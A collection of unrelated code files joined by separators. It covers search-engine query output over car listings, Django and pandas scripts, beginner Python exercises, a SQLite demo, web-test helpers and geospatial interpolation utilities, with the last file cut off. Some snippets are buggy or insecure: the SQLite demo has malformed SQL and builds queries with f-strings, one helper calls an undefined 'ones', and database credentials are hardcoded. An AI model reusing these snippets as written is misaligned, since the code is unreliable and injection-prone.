| gold | 00000000000000001996 | cool,favorite,reliable,towing | 00000000000000014700.00 |
| gold | 00000000000000001997 | cool,favorite,reliable,towing | 00000000000000014700.00 |
| gold | 00000000000000001996 | cool,electric,moon-roof,reliable | 00000000000000014400.00 |
| gold | 00000000000000001997 | cool,favorite,hybrid,reliable | 00000000000000014200.00 |
+-------+----------------------+----------------------------------+-------------------------+
10 rows in set, 325 hits, 15001 total docs
select color, year, tags, price from cars where query is "cool" and tags contains all ("cool", "hybrid") except("favorite") and color in ("red", "yellow") order by price desc limit 0,5
+--------+----------------------+----------------------------------+-------------------------+
| color | year | tags | price |
+--------+----------------------+----------------------------------+-------------------------+
| yellow | 00000000000000001995 | cool,hybrid,moon-roof,reliable | 00000000000000014500.00 |
| red | 00000000000000002000 | cool,hybrid,moon-roof,navigation | 00000000000000014500.00 |
| red | 00000000000000001993 | cool,hybrid,moon-roof,navigation | 00000000000000014400.00 |
| red | 00000000000000002002 | automatic,cool,hybrid,navigation | 00000000000000014200.00 |
| yellow | 00000000000000001999 | automatic,cool,hybrid,reliable | 00000000000000012200.00 |
+--------+----------------------+----------------------------------+-------------------------+
5 rows in set, 132 hits, 15001 total docs
select color, year, tags, price from cars where query is "cool" and tags contains all ("cool", "hybrid") except ("favorite") and color in ("red") with ("aaa":"111", "bbb":"222") order by price desc limit 0,10 browse by color(true, 1, 10, hits), year(true, 1, 10, value), price(true, 1, 10, value)
+-------+----------------------+----------------------------------+-------------------------+
| color | year | tags | price |
+-------+----------------------+----------------------------------+-------------------------+
| red | 00000000000000002000 | cool,hybrid,moon-roof,navigation | 00000000000000014500.00 |
| red | 00000000000000001993 | cool,hybrid,moon-roof,navigation | 00000000000000014400.00 |
| red | 00000000000000002002 | automatic,cool,hybrid,navigation | 00000000000000014200.00 |
| red | 00000000000000001998 | automatic,cool,hybrid,navigation | 00000000000000012100.00 |
| red | 00000000000000002002 | automatic,cool,hybrid,reliable | 00000000000000011500.00 |
| red | 00000000000000002002 | automatic,cool,hybrid,reliable | 00000000000000011400.00 |
| red | 00000000000000001998 | automatic,cool,hybrid,reliable | 00000000000000011400.00 |
| red | 00000000000000001996 | automatic,cool,hybrid,reliable | 00000000000000011200.00 |
| red | 00000000000000001999 | automatic,cool,hybrid,reliable | 00000000000000011100.00 |
| red | 00000000000000002001 | cool,hybrid,moon-roof,reliable | 00000000000000010500.00 |
+-------+----------------------+----------------------------------+-------------------------+
10 rows in set, 59 hits, 15001 total docs
+-------------+
| color |
+-------------+
| white (73) |
| yellow (73) |
| blue (62) |
| silver (61) |
| red (59) |
| green (58) |
| gold (53) |
| black (52) |
+-------------+
+-----------------------+
| price |
+-----------------------+
| [* TO 6700] (21) |
| [10000 TO 13100] (8) |
| [13200 TO 17300] (3) |
| [6800 TO 9900] (27) |
+-----------------------+
+---------------------+
| year |
+---------------------+
| [1993 TO 1994] (16) |
| [1995 TO 1996] (13) |
| [1997 TO 1998] (10) |
| [1999 TO 2000] (9) |
| [2001 TO 2002] (11) |
+---------------------+
select color, grouphitscount from cars group by color top 1 limit 0,16000
+--------+----------------+
| color | grouphitscount |
+--------+----------------+
| white | 2196 |
| yellow | 2105 |
| red | 2160 |
| black | 3141 |
| green | 1085 |
| gold | 1110 |
| blue | 1104 |
| silver | 2100 |
+--------+----------------+
8 rows in set, 15001 hits, 15001 total docs
Note: (= (+ 2196 2105 2160 3141 1085 1110 1104 2100) 15001)
select uid, color, makemodel from cars group by color top 3 limit 0,4
=========================================
| uid | color | makemodel |
=========================================
| 1 | white | asian/acura/1.6el |
| 2 | white | asian/acura/1.6el |
| 3 | white | asian/acura/1.6el |
+-----+--------+------------------------+
| 0 | yellow | asian/acura/1.6el |
| 244 | yellow | european/bentley/azure |
| 245 | yellow | european/bentley/azure |
+-----+--------+------------------------+
| 242 | red | european/bentley/azure |
| 246 | red | european/bentley/azure |
| 247 | red | european/bentley/azure |
+-----+--------+------------------------+
| 241 | black | european/bentley/azure |
| 243 | black | european/bentley/azure |
| 10 | black | asian/acura/3.2tl |
+-----+--------+------------------------+
=========================================
4 groups in set, 15001 hits, 15001 total docs
// Signal search example
select tags, publicShareFlag, userid, country, updateType from signal where country in ("us") and My-Network in ("1", "2") given facet param (My-Network, "srcid", int, "8233570")
"""
|
# Copyright (c) Meta Platforms, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from habitat_sim._ext.habitat_sim_bindings import (
Mp3dObjectCategory,
Mp3dRegionCategory,
SceneGraph,
SceneNode,
SceneNodeType,
SemanticCategory,
SemanticLevel,
SemanticObject,
SemanticRegion,
SemanticScene,
)
__all__ = [
"Mp3dObjectCategory",
"Mp3dRegionCategory",
"SceneGraph",
"SceneNode",
"SceneNodeType",
"SemanticCategory",
"SemanticLevel",
"SemanticObject",
"SemanticRegion",
"SemanticScene",
]
|
from django.contrib import admin
from django.urls import path, include
from markdownblog.urls import router as blog_router
urlpatterns = [
path('admin/', admin.site.urls),
path('api/',include(blog_router.urls)),
path('markdownx/', include('markdownx.urls')),
]
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from collections import Counter
import csv
import sys
df = pd.read_csv('movie_metadata.csv')
df_edited = df.drop(["color", "num_critic_for_reviews", "actor_3_facebook_likes", "actor_1_facebook_likes",\
"num_voted_users", "facenumber_in_poster", "num_user_for_reviews",\
"actor_2_facebook_likes", "aspect_ratio", "director_facebook_likes",\
"movie_imdb_link", "cast_total_facebook_likes", "movie_facebook_likes",\
"content_rating"], axis=1)
df_edited.rename(
columns={
"director_name":"Director",
"duration":"Duration",
"actor_2_name":"Supporting_Actor_1",
"genres":"Genres",
"actor_1_name":"Lead_Actor",
"movie_title":"Title",
"actor_3_name":"Supporting_Actor_2",
"plot_keywords":"Keywords",
"language":"Language",
"country":"Country",
"title_year":"Year_of_Release",
"imdb_score":"IMDb_Rating",
"gross":"Revenue",
"budget":"Budget",
},
inplace=True
)
df_edited['Title'] = df_edited['Title'].astype(str).str[:-1]
df_edited = df_edited[["Title", "Director", "Year_of_Release", "Genres", "Budget", "Revenue", "Duration", "Language", "Country",\
"Lead_Actor", "Supporting_Actor_1", "Supporting_Actor_2", "IMDb_Rating", "Keywords"]]
def stringToList(string):
li = list(string.split("|"))
return li
def editColumns(df):
for index_label, row_series in df.iterrows():
df.at[index_label, 'Genres'] = stringToList(row_series['Genres'])
for index_label, row_series in df.iterrows():
df.at[index_label, 'Keywords'] = stringToList(str(row_series['Keywords']))
editColumns(df_edited)
df_edited.to_csv("edited_movie_database.csv", index=False, encoding='utf8')
|
from typing import (
Tuple,
)
from terminaltables import AsciiTable
from user import UnixUser
def _fmt_members(members: Tuple[str]):
return ",".join(members)
def _fmt_users(users: Tuple[UnixUser]):
return list([user.name, user.uid, user.group.name, user.gecos or "", user.home_dir, user.shell, _fmt_members(user.group_membership)] for user in users)
class UsersAsciiTable:
def __init__(self, users: Tuple[UnixUser]):
self._users = _fmt_users(users)
def __str__(self):
HEADER = ("User name", "Id", "Group", "Gecos", "Home dir", "Shell", "Group membership")
data = [HEADER]
data.extend(self._users)
ascii_table = AsciiTable(data)
return ascii_table.table
|
# -*- coding: utf-8 -*-
import os
import numpy as np
from .Template import wrap, Specifications, Template, expr_dir
def generate_unitconversions(args=None):
with Specifications("unitconversions.yml") as specs:
unitconversions = specs["unitconversions"]
units = []
abbrs = []
unitTypes = []
conversions = []
with Template(
"Units.h", os.path.join(expr_dir, "UnitConversionExpression", "Units.h"),
) as template:
for category, specs in unitconversions["categories"].items():
base = specs["base"]
abbr = specs["baseabbr"]
baseconversion = float(specs.get("baseconversion", 1))
bc = f"*{1/baseconversion}" if baseconversion != 1 else ""
units.append(base)
abbrs.append(abbr)
unitTypes.append(category)
conversions.append(1)
prefixes = specs.get("prefixes", {})
if "baseprefixes" in specs:
prefixes.update(unitconversions["prefixes"])
baseconversion = specs.get("baseconversion", 1)
units.extend((f"{prefix}{base}" for prefix in prefixes.keys()))
abbrs.extend((f"{prefix}{abbr}" for prefix in prefixes.values()))
unitTypes.extend((category for p in prefixes))
conversions.extend(
(
specs.get("custom", {}).get(
prefix, f"GSL_CONST_NUM_{prefix.upper()}"
)
for prefix in prefixes.keys()
)
)
units.extend(specs.get("conversions", {}).keys())
abbrs.extend(specs.get("conversions", {}).values())
unitTypes.extend((category for c in specs.get("conversions", {})))
conversions.extend(
(
specs.get("custom", {}).get(
conv, f"GSL_CONST_MKSA_{conv.upper()}{bc}"
)
for conv in specs.get("conversions", {}).keys()
)
)
unq, unq_idx, unq_cnt = np.unique(
abbrs, return_inverse=True, return_counts=True
)
assert np.all(unq_cnt == 1), np.array(abbrs)[unq_cnt != 1]
assert len(units) == len(abbrs)
assert len(units) == len(unitTypes)
assert len(units) == len(conversions)
categories = list(unitconversions["categories"].keys())
unitconversions = list(zip(units, abbrs, unitTypes, conversions))
unitconversions.sort(key=lambda k: k[1])
units, abbrs, unitTypes, conversions = zip(*unitconversions)
units = sorted(enumerate(units), key=lambda k: k[1])
template.replace(
UnitTypes=",\n\t".join((c.upper() for c in categories)),
numUnits=len(units),
unitNames=wrap((f'"{unit}"' for index, unit in units)),
unitIndices=wrap((str(index) for index, unit in units)),
unitAbbreviations=wrap((f'"{abbr}"' for abbr in abbrs)),
unitTypes=wrap((t.upper() for t in unitTypes)),
unitConversions=wrap(map(str, conversions)),
)
return locals()
if __name__ == "__main__":
generate_unitconversions()
|
import urllib.request
import re
# Check if the URL is well formed
def check_url_sanity(url):
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return re.match(regex, url) is not None
# Check if the URL exists
def check_url_validity(url):
try:
urllib.request.urlopen(url)
return True
except urllib.request.HTTPError as e:
return False
# Get the URL from user
def get_url():
url = input("URL: ")
return url
# Store the URL if it is valid
def store_url(url):
f=open("urls.txt", "a+")
f.write("{}\n".format(url))
f.close()
# Fetch stored URLs
def get_urls():
url_list = []
with open("urls.txt") as f:
url_list = f.readlines()
return url_list
def main():
choice = 3
while choice > 0 and choice < 4:
choice = int(input("1.Enter a new URL\n2.Use previous URL\n3.Exit\n"))
if choice == 1:
url = get_url()
if check_url_sanity(url):
if check_url_validity(url):
store_url(url)
print("Valid")
else:
print("Invalid")
elif choice == 2:
urls = get_urls()
ctr = 1
for url in urls:
print("{}. {}".format(ctr,url.rstrip()))
ctr += 1
run_url = int(input("Which URL would you like to run?\n"))
if check_url_validity(urls[run_url-1]):
print("Valid")
else:
print("Invalid")
elif choice == 3:
exit(0)
if __name__ == '__main__':
main() |
#Write a python script to generate list of no. 0 to 100. Filter out even and odd numbers using lambda + filter function.
list1=[]
for i in range(100):
list1.append(i)
even = list(filter(lambda x: x%2 == 0, list1))
print(even)
print("\nOdd numbers from the said list:")
odd = list(filter(lambda x: x%2 != 0, list1))
print(odd)
|
import datetime
import pytz
from dateutil.parser import parse
epoch = datetime.datetime.utcfromtimestamp(0)
epoch = epoch.replace(tzinfo=pytz.UTC)
TIME_FORMAT = '%Y-%m-%d %H:%M:%S %z'
# TODO: take mplotlib madates conversion take into consideraiton
def string_to_datetime(str_):
""" translate a formatted string to a datetime object
Args:
str_ (string): a formatted sgtring for date, time
Return:
datetime, a datetime object with UTC as timezone
"""
dt = parse(str_)
if dt.tzinfo is None:
dt = dt.replace(tzinfo=pytz.UTC)
return dt
def datetime_to_epoch(dt):
""" translate a python datetime object to seconds since epoch
Args:
dt (datetime): a datetime object
Returns:
int, seconds since epoch
"""
return int((dt-epoch).total_seconds())
def string_to_epoch(str_):
""" translate an UTC time string to epoch time
Args:
str_ (string): a string describing a UTC time in certain format
Returns:
int, seconds since the epoch
"""
return datetime_to_epoch(string_to_datetime(str_))
def datetime_to_string(dt):
""" translate a python datetime object into a readable string
Args:
dt (datetime): a datetime object
Returns:
string, a formatted string for date, time, and time zone
"""
return datetime.datetime.strftime(dt, TIME_FORMAT)
def epoch_to_datetime(epc):
""" translate seconds since epoch to a datetime object, UTC as timezone
Args:
epc (int) : seconds since epoch
Returns:
datetime, a datetime object with UTC as timezone
"""
return datetime.datetime.fromtimestamp(epc, pytz.utc)
def epoch_to_string(epc):
""" translate seconds since epoch to a formatted string
Args:
epc (int) : seconds since epoch
Returns:
string, a formatted string for date, time
"""
return datetime_to_string(epoch_to_datetime(epc)) |
row, cols = map(int, input().split())
mine = int(input())
arr = [[0 for i in range(cols)] for j in range(row)]
for i in range(mine):
_row, _cols = map(int, input().split())
arr[_row-1][_cols-1] = "*"
for R in range(row):
for C in range(cols):
if arr[R][C] == "*":
for _R in range(R-1, R+2):
for _C in range(C-1, C+2):
if _R>=0 and _C>=0:
try:
arr[_R][_C]+=1
except:
pass
for i in range(row):
for j in range(cols):
print(arr[i][j], end=" ")
print()
|
# Databricks notebook source
# RDD, Resilient Distributed Data Set
data = [1,2,3,4,5,6,7,8,9]
# Spark Context
rdd1 = sc.parallelize(data) # load the input into cluster memory
print("max ", rdd1.max())
# to run it, Shift + Enter key
# COMMAND ----------
print("Min", rdd1.min())
print("mean", rdd1.mean())
print("sum", rdd1.sum())
# COMMAND ----------
dbutils.fs.mount(
source = "wasbs://movielens@gksynapse2storage.blob.core.windows.net",
mount_point = "/mnt/movielens")
# COMMAND ----------
|
#Test Average and Grade
def calc_average(a,b,c,d,e):
average = (a+b+c+d+e)/5
print('Average:',average)
def determine_grade(a):
if a >=90 and a <= 100:
print('A')
elif a >= 80 and a <= 89:
print('B')
elif a >= 70 and a <= 79:
print('C')
elif a >= 60 and a <= 69:
print('D')
else:
print('F')
if __name__ == '__main__':
#a = float(input('Enter Grade:'))
#determine_grade(a)
grade1 = float(input('Grade:'))
determine_grade(grade1)
grade2 = float(input('Grade:'))
determine_grade(grade2)
grade3 = float(input('Grade:'))
determine_grade(grade3)
grade4 = float(input('Grade:'))
determine_grade(grade4)
grade5 = float(input('Grade:'))
determine_grade(grade5)
calc_average(grade1,grade2,grade3,grade4,grade5)
|
# Prompt: Write code that takes a long string and builds its word cloud
# data in a dictionary ↴ , where the keys are words and the values are the number
# of times the words occurred. Think about capitalized words.
string1 = "After beating the eggs, Dana read the next step:"
def split_words(s):
letters = []
punctuations = []
for l in s:
if l.isalpha() or l == " ":
letters.append(l)
else:
punctuations.append(l)
ret = ("".join(letters)).split(" ")
ret.extend(punctuations)
return ret
# print(split_words(string1))
def check_case(lst):
ret = []
def prep_word_cloud_data(s):
words = {}
list_s = split_words(s)
for word in list_s:
word = word.lower()
if word not in words:
words[word] = 1
else:
words[word] +=1
# for punc in list_punctuations:
# if punc not in words:
# words[punc] = 1
# else:
# words[punc] +=1
return words
print(prep_word_cloud_data(string1))
|
import sqlite3
from sqlite3 import Error
def create_connection(clothes):
""" create a database connection to a SQLite database """
conn = None
try:
conn = sqlite3.connect(clothes)
print(sqlite3.version)
except Error as e:
print(e)
finally:
if conn:
conn.close()
if __name__ == '__main__':
create_connection(r"C:\sqlite\db\clothes.db")
# connect sql to the database
connection = sqlite3.connect("database.py")
# cursor
crsr = connection.cursor()
# print statement will execute if there are no errors
print("Connected to the database")
# SQL command to create a table in the database
sql_command = """CREATE TABLE clothes (
id_number INTEGER PRIMARY KEY,
item_name VARCHAR(20),
color VARCHAR(20),
fabric VARCHAR(20),
hood CHAR(3),
brand VARCHAR(20);"""
# primary key
pk = [1,2, 3, 4, 5, 6]
# Enter 5 item names
item_name = ['Atom', 'Ansur', 'Beta', 'Superior Down', 'Event']
# Enter 5 colors
color = ['Blue', 'Brown', 'Maroon', 'Brown', 'Green']
# Enter 5 fabrics
fabric = ['Down', 'Ripstop', 'Goretex', 'Down', 'Ripstop']
# Enter hood variable
hood = ['No', 'Yes', 'Yes', 'No', 'Yes']
#enter name of brand
brand = ['Arcteryx', 'Klattermusen', 'Arcteryx', 'Mont Bell', 'And Wander']
for i in range(5):
crsr.execute(f'INSERT INTO clothes VALUES ({pk[i]}, "{item_name[i]}", "{color[i]}", "{fabric[i]}", "{hood[i]}", "{brand[i]}")')
# To save the changes in the files. Never skip this.
# If we skip this, nothing will be saved in the database.
connection.commit()
# execute the command to fetch all the data from the table
crsr.execute("SELECT * FROM clothes")
# store all the fetched data in the ans variable
ans = crsr.fetchall()
for i in ans:
print(i)
# close the connection
connection.close() |
# -*- coding: utf-8 -*-
from pylowiki.tests import *
def addComment():
return 'commentAddHandler_root'
def addComment_text():
return 'comment-textarea'
def addComment_submit():
return 'reply'
def addConversation():
return 'addDiscussion'
def addConversation_text():
return 'text'
def addConversation_title():
return 'title'
def addIdea():
return 'addIdea'
def addIdea_submit():
return ''
def editIdea_submit():
return 'reply'
def addIdea_text():
return 'title'
def addResource():
return 'addResource'
def addResource_title():
return 'title'
def addResource_link():
return 'link'
def addResource_text():
return 'text'
def createWorkshop_1_form():
return 'CreateWorkshop'
def create_workshop_1_personal_professional(kwargs=None):
#: value of button for creating a personal or professional workshop
#: can return value for choosing personal or professional workshops
if kwargs != None:
if 'personal' in kwargs:
if 'personal' == True:
return 'createPersonal'
else:
#: if we get selenium to drive this test,
#: we will be able to use the javascript for actually processing the payment form.
#: For now, we'll need to create a personal workshop but manually set it as professional
#: return 'createProfessional'
return 'createPersonal'
else:
return 'createPersonal'
else:
return 'createPersonal'
def createWorkshop_paymentForm():
return 'paymentForm'
def create_workshop_paymentToken():
return 'stripeToken'
def create_workshop_paymentToken_val():
return 'tok_19tVR0n1Mz7qua'
def createWorkshop_button():
return 'CreateWorkshop'
def createWorkshop_FileUploadForm():
return 'fileupload'
def createWorkshop_2_Basics():
return 'edit_issue'
def createWorkshopForm1_description():
return 'description'
def createWorkshopForm1_goals():
return 'goals'
def createWorkshopForm1_resources():
return 'allowResources'
def createWorkshopForm1_suggestions():
return 'allowSuggestions'
def createWorkshopForm1_title():
return 'title'
def createWorkshopForm2(private=True):
if private:
return 'private'
else:
return 'scope'
def createWorkshopForm2_submit():
return 'continueToNext'
def createWorkshopForm3():
return 'workshop_tags'
def createWorkshopForm4_continueToNext():
return 'continueToNext'
def createWorkshopForm5_wikiBackground():
return 'workshop_background'
def createWorkshopForm5_wikiBackground_text():
return 'data'
def createWorkshopForm5_wikiBackground_submit():
return ''
def editComment_submit():
return 'reply'
def login_email():
return 'email'
def login_homePage():
return 'sign_in'
def login_password():
return 'password'
def parameter_submit():
return 'submit'
def paymentForm():
return 'paymentForm'
def paymentFormAdminUpgrade():
return 'adminUpgradeForm'
def paymentFormAdminUpgradeSubmitName():
return 'admin-submit-button'
def profile_edit():
return 'infoEdit'
def submitNone():
return None
def upgradeWorkshop():
return 'workshopUpgrade'
def workshopSettings_allowIdeas(choice=True):
"""Takes bool input and returns form-specific input value replacting the parameter's value."""
if choice:
return u'1'
else:
return u'0'
def workshopSettings_allowResourceLinks(choice=True):
"""Takes bool input and returns form-specific input value replacting the parameter's value."""
if choice:
return u'1'
else:
return u'0'
def workshopSettings_privateForm():
return u'private'
def workshopSettings_privateForm_addMemberField():
return u'addMember'
def workshopSettings_privateForm_invite():
return u'newMember'
# looks like this input field is no longer used
#def workshopSettings_privateForm_sendInviteMsg():
# return u'sendInvite'
|
from copy import deepcopy
import random
# Consider using the modules imported above.
class Hat:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
self.contents = list()
for key, value in kwargs.items():
for x in range(value):
self.contents.append(key)
def draw(self, numberOfBalls):
draw = list()
if numberOfBalls >= len(self.contents):
draw = self.contents
return draw
draw = random.sample(self.contents, numberOfBalls)
for item in draw:
self.contents.remove(item)
return draw
def experiment(hat, expected_balls, num_balls_drawn, num_experiments):
index = 0
success = list()
while index < num_experiments :
new_hat = deepcopy(hat)
draw = new_hat.draw(num_balls_drawn)
expected = list()
for k,v in expected_balls.items() :
for x in range(v):
expected.append(k)
if set(draw) == set(expected) :
success.append(1)
else :
success.append(0)
index += 1
m = float(success.count(1))
n = float(len(success))
return m/n |
import psycopg2
import psycopg2.extras
if __name__ == '__main__' :
connection_string = "host= 'localhost' dbname='resort' user='resort' password='resort'"
conn = psycopg2.connect(connection_string,cursor_factory=psycopg2.extras.DictCursor )
###this part is to drop the existed tables and the data we have already loaded, and reloaded
with open('schema.sql','r') as setup:
cursor = conn.cursor()
setup_queries = setup.read()
cursor.execute(setup_queries)
conn.commit()
|
"""
High-level functions used across the CAP-Toolkit package.
"""
import h5py
import numpy as np
import pyproj
import xarray as xr
import pandas as pd
from scipy.spatial import cKDTree
from scipy.spatial.distance import cdist
from scipy import stats
from scipy.ndimage import map_coordinates
try:
from gdalconst import *
except ImportError as e:
from osgeo.gdalconst import *
from osgeo import gdal, osr
from scipy import signal
def print_args(args):
"""Print arguments passed to argparse."""
print("Input arguments:")
for arg in list(vars(args).items()):
print(arg)
def read_h5(fname, vnames):
"""Generic HDF5 reader.
vnames : ['var1', 'var2', 'var3']
"""
with h5py.File(fname, "r") as f:
variables = [f[v][()] for v in vnames]
return variables if len(vnames) > 1 else variables[0]
def save_h5(fname, vardict, mode="a"):
"""Generic HDF5 writer.
vardict : {'name1': var1, 'name2': va2, 'name3': var3}
"""
with h5py.File(fname, mode) as f:
for k, v in list(vardict.items()):
if k in f:
f[k][:] = np.squeeze(v)
else:
f[k] = np.squeeze(v)
def is_empty(ifile):
"""Test if file is corruted or empty"""
try:
with h5py.File(ifile, "r") as f:
if bool(list(f.keys())):
return False
else:
return True
except IOError:
return True
def find_nearest(arr, val):
"""Find index of 'nearest' value(s).
Args:
arr (nd array) : The array to search in (nd). No need to be sorted.
val (scalar or array) : Value(s) to find.
Returns:
out (tuple or scalar) : The index (or tuple if nd array) of nearest
entry found. If `val` is a list of values then a tuple of ndarray
with the indices of each value is return.
See also:
find_nearest2
"""
idx = []
if np.ndim(val) == 0:
val = np.array([val])
for v in val:
idx.append((np.abs(arr - v)).argmin())
idx = np.unravel_index(idx, arr.shape)
return idx if val.ndim > 1 else idx[0]
def make_grid(xmin, xmax, ymin, ymax, dx, dy, return_2d=False):
"""
Construct 2D-grid given input boundaries
:param xmin: x-coord. min
:param xmax: x-coord. max
:param ymin: y-coors. min
:param ymax: y-coord. max
:param dx: x-resolution
:param dy: y-resolution
:param return_2d: if true return grid otherwise vector
:return: 2D grid or 1D vector
"""
Nn = int((np.abs(ymax - ymin)) / dy) + 1
Ne = int((np.abs(xmax - xmin)) / dx) + 1
xi = np.linspace(xmin, xmax, num=Ne)
yi = np.linspace(ymin, ymax, num=Nn)
if return_2d:
return np.meshgrid(xi, yi)
else:
return xi, yi
def transform_coord(proj1, proj2, x, y):
"""
Transform coordinates from proj1 to proj2
usgin EPSG number
:param proj1: current projection (4326)
:param proj2: target projection (3031)
:param x: x-coord in current proj1
:param y: y-coord in current proj1
:return: x and y now in proj2
"""
proj1 = pyproj.Proj("+init=EPSG:" + str(proj1))
proj2 = pyproj.Proj("+init=EPSG:" + str(proj2))
return pyproj.transform(proj1, proj2, x, y)
def mad_std(x, axis=None):
"""
Robust std.dev using median absolute deviation
:param x: data values
:param axis: target axis for computation
:return: std.dev (MAD)
"""
return 1.4826 * np.nanmedian(np.abs(x - np.nanmedian(x, axis)), axis)
def interpmed(x, y, z, Xi, Yi, n, d):
"""
2D median interpolation of scattered data
:param x: x-coord (m)
:param y: y-coord (m)
:param z: values
:param Xi: x-coord. grid (2D)
:param Yi: y-coord. grid (2D)
:param n: number of nearest neighbours
:param d: maximum distance allowed (m)
:return: 1D array of interpolated values
"""
xi = Xi.ravel()
yi = Yi.ravel()
zi = np.zeros(len(xi)) * np.nan
tree = cKDTree(np.c_[x, y])
for i in range(len(xi)):
(dxy, idx) = tree.query((xi[i], yi[i]), k=n)
if n == 1:
pass
elif dxy.min() > d:
continue
else:
pass
zc = z[idx]
zi[i] = np.median(zc)
return zi
def interpgaus(x, y, z, s, Xi, Yi, n, d, a):
"""
2D interpolation using a gaussian kernel
weighted by distance and error
:param x: x-coord (m)
:param y: y-coord (m)
:param z: values
:param s: obs. errors
:param Xi: x-coord. interp. point(s) (m)
:param Yi: y-coord. interp. point(s) (m)
:param n: number of nearest neighbours
:param d: maximum distance allowed (m)
:param a: correlation length in distance (m)
:return: 1D vec. of prediction, sigma and nobs
"""
xi = Xi.ravel()
yi = Yi.ravel()
zi = np.zeros(len(xi)) * np.nan
ei = np.zeros(len(xi)) * np.nan
ni = np.zeros(len(xi)) * np.nan
tree = cKDTree(np.c_[x, y])
if np.all(np.isnan(s)): s = np.ones(s.shape)
for i in range(len(xi)):
(dxy, idx) = tree.query((xi[i], yi[i]), k=n)
if n == 1:
pass
elif dxy.min() > d:
continue
else:
pass
zc = z[idx]
sc = s[idx]
if len(zc[~np.isnan(zc)]) == 0: continue
# Weights
wc = (1./sc**2) * np.exp(-(dxy**2)/(2*a**2))
# Avoid singularity
wc += 1e-6
# Predicted value
zi[i] = np.nansum(wc * zc) / np.nansum(wc)
# Weighted rmse
sigma_r = np.nansum(wc * (zc - zi[i])**2) / np.nansum(wc)
# Obs. error
sigma_s = 0 if np.all(s == 1) else np.nanmean(sc)
# Prediction error
ei[i] = np.sqrt(sigma_r ** 2 + sigma_s ** 2)
# Number of points in prediction
ni[i] = 1 if n == 1 else len(zc)
return zi, ei, ni
def interpkrig(x, y, z, s, Xi, Yi, d, a, n):
"""
2D interpolation using ordinary kriging/collocation
with second-order markov covariance model.
:param x: x-coord (m)
:param y: y-coord (m)
:param z: values
:param s: obs. error added to diagonal
:param Xi: x-coord. interp. point(s) (m)
:param Yi: y-coord. interp. point(s) (m)
:param d: maximum distance allowed (m)
:param a: correlation length in distance (m)
:param n: number of nearest neighbours
:return: 1D vec. of prediction, sigma and nobs
"""
n = int(n)
# Check
if n == 1:
print('n > 1 needed!')
return
xi = Xi.ravel()
yi = Yi.ravel()
zi = np.zeros(len(xi)) * np.nan
ei = np.zeros(len(xi)) * np.nan
ni = np.zeros(len(xi)) * np.nan
tree = cKDTree(np.c_[x, y])
# Convert to meters
a *= 0.595 * 1e3
d *= 1e3
for i in range(len(xi)):
(dxy, idx) = tree.query((xi[i], yi[i]), k=n)
if dxy.min() > d:
continue
xc = x[idx]
yc = y[idx]
zc = z[idx]
sc = s[idx]
if len(zc) < 2: continue
m0 = np.median(zc)
c0 = np.var(zc)
# Covariance function for Dxy
Cxy = c0 * (1 + (dxy / a)) * np.exp(-dxy / a)
# Compute pair-wise distance
dxx = cdist(np.c_[xc, yc], np.c_[xc, yc], "euclidean")
# Covariance function Dxx
Cxx = c0 * (1 + (dxx / a)) * np.exp(-dxx / a)
# Measurement noise matrix
N = np.eye(len(Cxx)) * sc * sc
# Solve for the inverse
CxyCxxi = np.linalg.solve((Cxx + N).T, Cxy.T)
# Predicted value
zi[i] = np.dot(CxyCxxi, zc) + (1 - np.sum(CxyCxxi)) * m0
# Predicted error
ei[i] = np.sqrt(np.abs(c0 - np.dot(CxyCxxi, Cxy.T)))
# Number of points in prediction
ni[i] = len(zc)
return zi, ei, ni
def spatial_filter(x, y, z, dx, dy, n_sigma=3.0):
"""
Spatial outlier editing filter
:param x: x-coord (m)
:param y: y-coord (m)
:param z: values
:param dx: filter res. in x (m)
:param dy: filter res. in y (m)
:param n_sigma: cutt-off value
:param thres: max absolute value of data
:return: filtered array containing nan-values
"""
Nn = int((np.abs(y.max() - y.min())) / dy) + 1
Ne = int((np.abs(x.max() - x.min())) / dx) + 1
f_bin = stats.binned_statistic_2d(x, y, z, bins=(Ne, Nn))
index = f_bin.binnumber
ind = np.unique(index)
zo = z.copy()
for i in range(len(ind)):
# index for each bin
idx, = np.where(index == ind[i])
zb = z[idx]
if len(zb[~np.isnan(zb)]) == 0:
continue
dh = zb - np.nanmedian(zb)
foo = np.abs(dh) > n_sigma * np.nanstd(dh)
zb[foo] = np.nan
zo[idx] = zb
return zo
def interp2d(x, y, z, xi, yi, **kwargs):
"""
Raster to point interpolation based on
scipy.ndimage import map_coordinates
:param x: x-coord. in 2D (m)
:param y: x-coord. in 2D (m)
:param z: values in 2D
:param xi: interp. point in x (m)
:param yi: interp. point in y (m)
:param kwargs: see map_coordinates
:return: array of interp. values
"""
x = np.flipud(x)
y = np.flipud(y)
z = np.flipud(z)
x = x[0,:]
y = y[:,0]
nx, ny = x.size, y.size
x_s, y_s = x[1] - x[0], y[1] - y[0]
if np.size(xi) == 1 and np.size(yi) > 1:
xi = xi * ones(yi.size)
elif np.size(yi) == 1 and np.size(xi) > 1:
yi = yi * ones(xi.size)
xp = (xi - x[0]) * (nx - 1) / (x[-1] - x[0])
yp = (yi - y[0]) * (ny - 1) / (y[-1] - y[0])
coord = np.vstack([yp, xp])
zi = map_coordinates(z, coord, **kwargs)
return zi
def tiffread(ifile):
"""
Reading tif-file to memory
:param ifile: path+name of tif file
:return: X, Y, Z, dx, dy and proj
"""
file = gdal.Open(ifile, GA_ReadOnly)
metaData = file.GetMetadata()
projection = file.GetProjection()
src = osr.SpatialReference()
src.ImportFromWkt(projection)
proj = src.ExportToWkt()
Nx = file.RasterXSize
Ny = file.RasterYSize
trans = file.GetGeoTransform()
dx = trans[1]
dy = trans[5]
Xp = np.arange(Nx)
Yp = np.arange(Ny)
(Xp, Yp) = np.meshgrid(Xp, Yp)
X = trans[0] + (Xp + 0.5) * trans[1] + (Yp + 0.5) * trans[2]
Y = trans[3] + (Xp + 0.5) * trans[4] + (Yp + 0.5) * trans[5]
band = file.GetRasterBand(1)
Z = band.ReadAsArray()
dx = np.abs(dx)
dy = np.abs(dy)
